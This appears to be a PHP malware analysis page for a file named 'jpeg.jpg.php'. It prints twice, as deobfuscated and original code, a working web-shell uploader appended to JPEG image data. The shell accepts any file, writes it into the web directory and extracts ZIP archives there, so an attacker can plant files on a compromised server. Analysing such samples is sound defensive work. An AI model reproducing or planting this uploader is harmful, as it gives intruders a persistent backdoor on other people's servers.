PHP Malware Analysis

Back to list

Filename: jpeg.jpg.php

Tags

Input
  • _POST
  • _FILES
Files
  • copy

Deobfuscated code

JFIFICC_PROFILElcms0mntrRGB XYZ acspAPPL-lcmsdesc8cprt@Nwtptchad,rXYZbXYZgXYZrTRC gTRC, bTRCL chrml$mlucenUSsRGB built-inmlucenUS2No copyright, use freelyXYZ -sf32J*XYZ o8XYZ $XYZ bparaff
Y
[paraff
Y
[paraff
Y
[chrmT{L&f\C	!"$"$C"5B38_4`sIJ2"F)j|9<܄`"ӳ`FƟ[RE7J=lXD`} 9?H("9dwg:>xX4ZŔ!Mey"X$G/ qXQ7LHhdʋ"1
f/e92GyCˁ99J)h4kTRT
ڪ#"VK%FL=
B1zevI~$J_:#@+*DhhB@kO1h>	ϚWl&}JQsPu]Tc&Y,UjEōiEeXPL!ΏG~Y#8
U_Ôr̞Q-5C)~uckh#)0CgrTݑ5nUR<PԢAV}Ŀ"XQ4CfVH4]+%64AjwxAw瞌׬%Y|W+nJ	ƕ&,|h'̳=ӫ
uVa-aH#+!"1# 23A$45:<Ke^n.h)!mjѫ8qC׺9ܽCbK"2?nQ-^uTJ*PkmEwPOp
x@54JM8{7}%~c(*%TdMRE#PEoqJۨSf]CiӤ1^u"~^@=>>mWYI#<
hP?.)hvhhbGsK^,yO/ (@<?W+R@oW;IJӹc44Ih$[Zʻ^Փn/oOӚNZ޷&?4c?j{oC)vE	]]?I@2",\F\}bhԇh2dWP4&㨛e[RK~)ڏ4\%Iv.&9$j/4Mk jORd

})#
Ƥeme=RܽBs\:CO~>ӝ!XŹ^j&\_[5#RT҂̒Eػϯqy9`UӌԘo`!ajpr-hknDvխXR(p'S4,6P>⸣]03XHVf{yL]׈x~d@jm5^A$=Ѭ0bH|u	q,qj$kk|}&XC4-ɂ#Y4
ڥoJ1%Ζhz5c;#-`07wkEkLh_h5h-{<՚6u4vDVy"N>xy:jM*Db";imYUiC2'95|ժ&NBGDvj#Ak1rkw[1q/
S+;%|@lfj,n7w2QjUlTϨƁ#8<?2WW[Ên*#e[Ȼrc`ծ5į䫉7kC쑹M_ӷ84EO"?yTT:t$U8mQm! Ǵ-ϒRcp#e˂bU(Vks~J-I޳ot|0vOđ!̒9k8\flɹ$"7_
'톏ݸF5?f߃(fGK$qI6i#7tB/8*(MZoQTq*iώZn9~(yEF]o|v%դnV}E_p?p?5!1AQ "aq2BR#br$03?FNS;6^ʫNw&rmZysB-p.݃!q{:]JfĵW1lF 8"18xOlBs'
7s}ܬ-~a^X!!io}VU3[6P5S W/u?gHv*UHW
w}(bު|一x1Ih[V—WW.hʆ1I!-Z%SMdfUIR-0(A{BjE.YBǒmVF7{+Vʘ_y,e?MW4XR_ꨵ>G2p`-j]$i.{/'`C)+w#=;0NR4"?TL*tƀ/s:_eZD."d[JgY胃dGD):M~-lխSϲmODػ;苍UJBuC>`VʑGwp/!*i{\;zOcG<y蠸KAq<Mm!BQj|苎?0VX4{(jZw8RW%v/F&$S' Gzg-.eM-OE2MF9w0=8L'
.慝ĄcG	k)U)bٴ?%pEz͏npTi$2D|\}T_dBTڤڎm.#9)U𹠄괤@WpPP<+og(0]Qm<7}ЙP<֥%!1AQaq ?!tJd1$&l0(i4c3G+bW.e2Zb7BqO#_+=MH~93#Oׁ̮q_d*sgPRsb4,X+Q[a@xʽC]a/n:_,ʩ~bwm\ߙK8O:L s>v@D6O&׏DL%D&"9=*--	ulYs5/sÛh{q?Qh:\'=@eqa,AlSVϏ
	J[WԬj.C"-eaGej}BC\%<
D@[L*[Zw.WfE0Uze7xar솚2uA
+(0Y.][0.i.RTOcm12$++hCb)=wJ&%~%[hmL̦%sz(r1%`KWgWTRG~\ˉnF")=Jܵ$)c
yF}.+2BȮE QHfy
GtQGD9<̛]"`D_mMc26ZSeƍ,[pH	X~N
Qqv2TJ*nȆs8H4P}@3(4*SZ$d P@PԼf|2MgԸvf53Jbq_
W@x'nS09JIWSU.U[f"{Om~XܐNˇ|!tmTLQHjm:E
k5%Vda`3EF-I;+`%>s64
frSsPO*~K-Qs~mDERD16

PfqHMyzaX#8
Džg2\t栭Q5ܶ?N(G
&r%hl2SL7\Uw7K~:_SEgc,ɟ.iQ%I%rE)!(=ĸD3	nSYaΒV_Z(|FP!ܤqZ֑'c:=Nb[əP |(j"EARqą76DmPg
K4/^#LziC'ss8{ME
EyЂ$]6S
<OJK[GEMd7R2̠VU|NN`e
j.tf<ǧRP%L3)[?6.CxóڌK'7js)?W+Ȉ*
"\RڇuYT~/(bAR>0!4L@o$r
fḆʱjz<:&\%avL{c9~I	JOzj+B-5eCb\Wz*ָ\3d-V[bU2\{S%dg 7,:7r;8Q+YfIy޷h4? s400F,(b
024pH,pp `,G$s3E(2(H(c43A"088ӎÄ,0q$p?p?&!1AQaq?"A9\BׯkYQH!2z"-49KDSxaA0*Y!)\A)0S87gn҃@'W+DFT'
UivFIM t%0ǒRWUQMw!(pMH@[Ne[qM\P#C D'zqB]6nI@e)5h!o30vU]`X$/˯`%J-^oȡo3!+@ٳ(E"T4jf8xe\E:;+%ZVR(B2O@4](du8`@-IֹLqej:8QG<-ؗ@XJmJ|aBb
f?MtpgB,ug=6J})@t\ĶpIAѼT5ڇ0.WeVcv\Q~~=ZVUb.sXFg6.eM4|7ZȠ22ˌ#PSHVL3K+0;=Cn5\"97Yn%)'DJqL;_P6GJ\kOOġV+[NQ(JJ9W	¸Qw\mx	Fe汯iI'?12&Ot~bg%L+IQXtJo\u@-~`:=
'{E
4r3Q@\ctˬP%PKB^.hg	,Wі*8F#{;Uw
x)JhɆZCȟAUb'iqr%3t_t%6`4(Pn8I0tfpcEhғ>
ȉPn+@XgAؖƞ,F1Q.	n>*{,%4.}	,V\T*iwvKҎ%Xy۷1lR
=BVPine/x%4Bɀے+z,x.GNBGCp +Υ…ʜ/Ec=.g3t1ZYQUm*F59=Z/\CvJKs%ۅgǶGCx(`!q20a$͓9:ES*6UʞU{k*H5
cׁ;dli2/Un"ڤ֪;ElE2xp:30XL0%EA/
-UuЇ
.-j< U|B|OYW4V]U=D݌AXc+n#m[?hVYoEwJ
ԆzEoz8-(̭P	h6ǔFDXkYkKԠ݊
{]J採	yYQŢdrbeujYHp?~JWii#Bip5&r"S@F[eH*fŃEН*X{v6tvDI^Hu|p
ǿkLV[ߴAh^b[n
0ߛ%9RR!m
qJӁd$-NT.i`.d`Tm FEb揈=E1na0~e+1XaQb@(4=bsMzq
WX5O3	;=Duz
la2<[:X.N--XutX)5ZjJ|tyigJ!}S]^қGY*es1v"%hߘYiru
he`aQSC01j	YuʮC^L2JJ@MLy576ů\@AЉ})[MƯxsPr`PDV(yEp|	r@Y2=)Y %x\PGc7uL,&4-BaKgNu
$0̍DIn0R.Rn̩Jf`XX!
i"WD4@uLe`HdO=fLJ
q)##-4r^vKXl.MzLpo3/EF(
hӸ4\x^0[r'^]vOcG%l`cl4!_L8iQ‹-+5,@VVeD;h`Kb]+ȍ	*Zx57c1=la&NA)	WLjtTI[ıxmiT8;bf1ѣhVu9
jc
)VCaXZb-.௼F>EcS*Ȁc]6+s08aV`Z1\	IVWWĶCp3Fj@'Texy
vr-q
 6&@
BMy+窽h9eʹ<b!AI}P#G7}%T(y\s+C¦*<<?php 
echo "<h1>GOTTEN SIKICI UPLOADER<h1/>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    $file = $_FILES['file']['name'];
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        $zip = new ZipArchive();
        if ($zip->open($file) === TRUE) {
            $zip->extractTo('./');
            $zip->close();
            echo "Zip Cikarma Basarili!";
        } else {
            echo "Dosya Yukleme Basarili!";
        }
    } else {
        echo "<b>Yukleme Basarisiz :(</b><br><br>";
    }
}


Original code

JFIFICC_PROFILElcms0mntrRGB XYZ acspAPPL-lcmsdesc8cprt@Nwtptchad,rXYZbXYZgXYZrTRC gTRC, bTRCL chrml$mlucenUSsRGB built-inmlucenUS2No copyright, use freelyXYZ -sf32J*XYZ o8XYZ $XYZ bparaff
Y
[paraff
Y
[paraff
Y
[chrmT{L&f\C	!"$"$C"5B38_4`sIJ2"F)j|9<܄`"ӳ`FƟ[RE7J=lXD`} 9?H("9dwg:>xX4ZŔ!Mey"X$G/ qXQ7LHhdʋ"1
f/e92GyCˁ99J)h4kTRT
ڪ#"VK%FL=
B1zevI~$J_:#@+*DhhB@kO1h>	ϚWl&}JQsPu]Tc&Y,UjEōiEeXPL!ΏG~Y#8
U_Ôr̞Q-5C)~uckh#)0CgrTݑ5nUR<PԢAV}Ŀ"XQ4CfVH4]+%64AjwxAw瞌׬%Y|W+nJ	ƕ&,|h'̳=ӫ
uVa-aH#+!"1# 23A$45:<Ke^n.h)!mjѫ8qC׺9ܽCbK"2?nQ-^uTJ*PkmEwPOp
x@54JM8{7}%~c(*%TdMRE#PEoqJۨSf]CiӤ1^u"~^@=>>mWYI#<
hP?.)hvhhbGsK^,yO/ (@<?W+R@oW;IJӹc44Ih$[Zʻ^Փn/oOӚNZ޷&?4c?j{oC)vE	]]?I@2",\F\}bhԇh2dWP4&㨛e[RK~)ڏ4\%Iv.&9$j/4Mk jORd

})#
Ƥeme=RܽBs\:CO~>ӝ!XŹ^j&\_[5#RT҂̒Eػϯqy9`UӌԘo`!ajpr-hknDvխXR(p'S4,6P>⸣]03XHVf{yL]׈x~d@jm5^A$=Ѭ0bH|u	q,qj$kk|}&XC4-ɂ#Y4
ڥoJ1%Ζhz5c;#-`07wkEkLh_h5h-{<՚6u4vDVy"N>xy:jM*Db";imYUiC2'95|ժ&NBGDvj#Ak1rkw[1q/
S+;%|@lfj,n7w2QjUlTϨƁ#8<?2WW[Ên*#e[Ȼrc`ծ5į䫉7kC쑹M_ӷ84EO"?yTT:t$U8mQm! Ǵ-ϒRcp#e˂bU(Vks~J-I޳ot|0vOđ!̒9k8\flɹ$"7_
'톏ݸF5?f߃(fGK$qI6i#7tB/8*(MZoQTq*iώZn9~(yEF]o|v%դnV}E_p?p?5!1AQ "aq2BR#br$03?FNS;6^ʫNw&rmZysB-p.݃!q{:]JfĵW1lF 8"18xOlBs'
7s}ܬ-~a^X!!io}VU3[6P5S W/u?gHv*UHW
w}(bު|一x1Ih[V—WW.hʆ1I!-Z%SMdfUIR-0(A{BjE.YBǒmVF7{+Vʘ_y,e?MW4XR_ꨵ>G2p`-j]$i.{/'`C)+w#=;0NR4"?TL*tƀ/s:_eZD."d[JgY胃dGD):M~-lխSϲmODػ;苍UJBuC>`VʑGwp/!*i{\;zOcG<y蠸KAq<Mm!BQj|苎?0VX4{(jZw8RW%v/F&$S' Gzg-.eM-OE2MF9w0=8L'
.慝ĄcG	k)U)bٴ?%pEz͏npTi$2D|\}T_dBTڤڎm.#9)U𹠄괤@WpPP<+og(0]Qm<7}ЙP<֥%!1AQaq ?!tJd1$&l0(i4c3G+bW.e2Zb7BqO#_+=MH~93#Oׁ̮q_d*sgPRsb4,X+Q[a@xʽC]a/n:_,ʩ~bwm\ߙK8O:L s>v@D6O&׏DL%D&"9=*--	ulYs5/sÛh{q?Qh:\'=@eqa,AlSVϏ
	J[WԬj.C"-eaGej}BC\%<
D@[L*[Zw.WfE0Uze7xar솚2uA
+(0Y.][0.i.RTOcm12$++hCb)=wJ&%~%[hmL̦%sz(r1%`KWgWTRG~\ˉnF")=Jܵ$)c
yF}.+2BȮE QHfy
GtQGD9<̛]"`D_mMc26ZSeƍ,[pH	X~N
Qqv2TJ*nȆs8H4P}@3(4*SZ$d P@PԼf|2MgԸvf53Jbq_
W@x'nS09JIWSU.U[f"{Om~XܐNˇ|!tmTLQHjm:E
k5%Vda`3EF-I;+`%>s64
frSsPO*~K-Qs~mDERD16

PfqHMyzaX#8
Džg2\t栭Q5ܶ?N(G
&r%hl2SL7\Uw7K~:_SEgc,ɟ.iQ%I%rE)!(=ĸD3	nSYaΒV_Z(|FP!ܤqZ֑'c:=Nb[əP |(j"EARqą76DmPg
K4/^#LziC'ss8{ME
EyЂ$]6S
<OJK[GEMd7R2̠VU|NN`e
j.tf<ǧRP%L3)[?6.CxóڌK'7js)?W+Ȉ*
"\RڇuYT~/(bAR>0!4L@o$r
fḆʱjz<:&\%avL{c9~I	JOzj+B-5eCb\Wz*ָ\3d-V[bU2\{S%dg 7,:7r;8Q+YfIy޷h4? s400F,(b
024pH,pp `,G$s3E(2(H(c43A"088ӎÄ,0q$p?p?&!1AQaq?"A9\BׯkYQH!2z"-49KDSxaA0*Y!)\A)0S87gn҃@'W+DFT'
UivFIM t%0ǒRWUQMw!(pMH@[Ne[qM\P#C D'zqB]6nI@e)5h!o30vU]`X$/˯`%J-^oȡo3!+@ٳ(E"T4jf8xe\E:;+%ZVR(B2O@4](du8`@-IֹLqej:8QG<-ؗ@XJmJ|aBb
f?MtpgB,ug=6J})@t\ĶpIAѼT5ڇ0.WeVcv\Q~~=ZVUb.sXFg6.eM4|7ZȠ22ˌ#PSHVL3K+0;=Cn5\"97Yn%)'DJqL;_P6GJ\kOOġV+[NQ(JJ9W	¸Qw\mx	Fe汯iI'?12&Ot~bg%L+IQXtJo\u@-~`:=
'{E
4r3Q@\ctˬP%PKB^.hg	,Wі*8F#{;Uw
x)JhɆZCȟAUb'iqr%3t_t%6`4(Pn8I0tfpcEhғ>
ȉPn+@XgAؖƞ,F1Q.	n>*{,%4.}	,V\T*iwvKҎ%Xy۷1lR
=BVPine/x%4Bɀے+z,x.GNBGCp +Υ…ʜ/Ec=.g3t1ZYQUm*F59=Z/\CvJKs%ۅgǶGCx(`!q20a$͓9:ES*6UʞU{k*H5
cׁ;dli2/Un"ڤ֪;ElE2xp:30XL0%EA/
-UuЇ
.-j< U|B|OYW4V]U=D݌AXc+n#m[?hVYoEwJ
ԆzEoz8-(̭P	h6ǔFDXkYkKԠ݊
{]J採	yYQŢdrbeujYHp?~JWii#Bip5&r"S@F[eH*fŃEН*X{v6tvDI^Hu|p
ǿkLV[ߴAh^b[n
0ߛ%9RR!m
qJӁd$-NT.i`.d`Tm FEb揈=E1na0~e+1XaQb@(4=bsMzq
WX5O3	;=Duz
la2<[:X.N--XutX)5ZjJ|tyigJ!}S]^қGY*es1v"%hߘYiru
he`aQSC01j	YuʮC^L2JJ@MLy576ů\@AЉ})[MƯxsPr`PDV(yEp|	r@Y2=)Y %x\PGc7uL,&4-BaKgNu
$0̍DIn0R.Rn̩Jf`XX!
i"WD4@uLe`HdO=fLJ
q)##-4r^vKXl.MzLpo3/EF(
hӸ4\x^0[r'^]vOcG%l`cl4!_L8iQ‹-+5,@VVeD;h`Kb]+ȍ	*Zx57c1=la&NA)	WLjtTI[ıxmiT8;bf1ѣhVu9
jc
)VCaXZb-.௼F>EcS*Ȁc]6+s08aV`Z1\	IVWWĶCp3Fj@'Texy
vr-q
 6&@
BMy+窽h9eʹ<b!AI}P#G7}%T(y\s+C¦*<<?php
  echo '<h1>GOTTEN SIKICI UPLOADER<h1/>';
  echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  if( $_POST['_upl'] == "Upload" ) {
  $file = $_FILES['file']['name'];
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  $zip = new ZipArchive;
  if ($zip->open($file) === TRUE) {
     $zip->extractTo('./');
     $zip->close();
  echo 'Zip Cikarma Basarili!';
  } else {
  echo 'Dosya Yukleme Basarili!';
  }
  }else{
  echo '<b>Yukleme Basarisiz :(</b><br><br>';
  }
  }

?>